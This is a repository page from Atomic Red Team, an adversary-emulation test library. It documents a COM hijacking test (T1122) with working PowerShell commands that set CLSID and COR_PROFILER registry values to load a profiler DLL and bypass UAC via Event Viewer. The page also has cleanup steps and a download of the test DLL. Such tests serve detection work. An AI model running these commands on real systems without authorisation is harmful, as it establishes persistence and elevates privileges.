security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
9fa3eefeb365c7921acbba3c337e899199781d07
atomic-red-team/atomics/T1122/T1122.md
T
CircleCI Atomic Red Team doc generator 2bde901e95 Generate docs from job=validate_atomics_generate_docs branch=master
2020-05-02 00:36:51 +00:00

3.7 KiB
Raw Blame History

T1122 - Component Object Model Hijacking

Description from ATT&CK

The Component Object Model (COM) is a system within Windows to enable interaction between software components through the operating system. (Citation: Microsoft Component Object Model) Adversaries can use this system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Windows Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead. (Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.

Atomic Tests


Atomic Test #1 - COM Hijack Leveraging .NET profiler DLL

Creates environment variables and CLSID to enable a .NET profiler. The profiler DLL (atomicNotepad.dll) executes when the CLR is loaded by the Event Viewer process. Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing notepad.exe with high integrity. If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity.

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
file_name profiler DLL Path PathToAtomicsFolder\T1122\bin\T1122x64.dll
clsid_guid custom clsid guid String {09108e71-974c-4010-89cb-acf471ae9e2c}

Attack Commands: Run with powershell!

Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan
New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null
New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
Write-Host "executing eventvwr.msc" -ForegroundColor Cyan
START MMC.EXE EVENTVWR.MSC
Start-Sleep 5

Cleanup Commands:

Write-Host "Removing registry keys" -ForegroundColor Cyan
Remove-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}" -Recurse -Force
Remove-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -Force | Out-Null
Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -Force | Out-Null
Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -Force | Out-Null

Dependencies: Run with powershell!

Description: #{file_name} must be present
Check Prereq Commands:
if (Test-Path #{file_name}) {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1122/bin/T1122x64.dll" -OutFile "#{file_name}"

Reference in New Issue View Git Blame Copy Permalink